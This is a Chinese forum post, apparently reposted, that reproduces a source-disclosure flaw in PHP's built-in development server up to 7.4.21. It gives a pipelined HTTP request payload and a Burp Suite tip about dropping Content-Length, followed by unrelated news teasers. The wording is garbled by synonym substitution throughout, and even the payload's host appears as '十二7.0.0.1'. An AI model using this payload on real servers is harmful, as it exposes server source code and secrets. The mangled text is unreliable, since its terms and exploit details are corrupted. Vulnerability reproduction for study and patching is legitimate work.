华人澳洲中文论坛

PHP \u003c= 7.4.21近程源码泄漏破绽复现

[复制链接]

2023-2-1 21:52:46 68 0

英文原版文章地址:
http://blog.projectdiscovery.io/php-http-server-source-disclosure/
环境间接使用PHP study下载PHP,而后使用 -S 的形式启动办事测试
测试版本从 5.4.45nts - 8.0.2nts 都是能够胜利读取到源码的


间接打payload,然而发现并无读取到源码
GET /phpinfo.php HTTP/1.1 Host: 十二7.0.0.1 \r\n \r\n GET / HTTP/1.1 \r\n \r\n


一个坑点,使用burp测试的时分要关掉自动填充Content-Length
勾选掉上面这一行


而后把Content-Length行删除掉再发包

发表回复

您需要登录后才可以回帖 登录 | 立即注册

返回列表 本版积分规则

:
中级会员
:
论坛短信
:
未填写
:
未填写
:
未填写

主题34

帖子46

积分216

图文推荐

  • 撞穿学校栅栏害死十一岁男孩的司机不必坐牢

    一位女司机撞穿学校栅栏、害死了11岁男孩,被罚20

  • 全科医生正告花粉症时节正在好转

    全国各地的全科医生正告春季的开端标记着花粉症时

  • 新西兰总理:出世在新西兰的新纳粹Thomas S

    新西兰总理拉克森称新纳粹Thomas Sewell是坏人,

  • 新州护士和助产士承受暂时加薪3%的前提

    新州护士和助产士投票承受政府提出的暂时加薪3%以

  • 新纳粹份子如何利用“普通父母”的掩护在反

    星期天,新纳粹份子在反移民集会开端前大约一个小